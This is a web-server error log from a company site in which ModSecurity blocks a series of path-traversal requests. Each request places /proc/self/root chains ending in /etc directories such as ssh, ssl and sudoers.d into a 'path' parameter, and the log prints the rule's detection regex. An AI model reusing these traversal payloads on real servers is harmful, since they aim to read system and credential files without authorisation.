[Thu Mar 19 05:16:06.321024 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:60372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwxl_V7PWP6ixUYl6PJQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:07.674908 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:60384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwx-oXxyEfFpUF8f_kBgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:10.227699 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:60400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwyuoXxyEfFpUF8f_kCAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:15.149892 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:42792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwz_u8EFLIOrSqIptyGQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:16.648325 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:42800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw0OoXxyEfFpUF8f_kEAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:18.031437 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:42802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw0hkFeYa1D6dYQnDCGAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:19.403719 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:48438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw0-oXxyEfFpUF8f_kEwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:20.766106 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:48452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw1Pu8EFLIOrSqIptyGgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:27.787902 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:48466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw2xkFeYa1D6dYQnDCHQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:29.507123 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:50426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw3fu8EFLIOrSqIptyHQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:32.051866 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:50436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw4Pu8EFLIOrSqIptyIgAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:16:40.095346 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:50450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw6Pu8EFLIOrSqIptyLQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:16:43.668157 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:59976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw61_V7PWP6ixUYl6POwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:45.047191 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:59992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw7eyqAr6etmhZHNo3GgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:16:46.395478 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:59996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw7sdf6f5d65gmYZRGxwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:16:59.104805 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:60012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw-wbLMZ6AikZjR9Uw1QAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:17:02.827371 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:48272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuw_hkFeYa1D6dYQnDCMAAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:17:04.159250 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:48276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxAOoXxyEfFpUF8f_kIwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:17:20.958929 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.244.43:52634] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuxEBkFeYa1D6dYQnDCNAAAAcA"]
[Thu Mar 19 05:18:08.332499 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:48290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxQP-YZRR_7pZ7nDJhVAAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:18:10.715525 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:57688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxQgkwaGbbGflqUZCKPwAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:18:14.418437 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:57702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxRhkFeYa1D6dYQnDCXwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
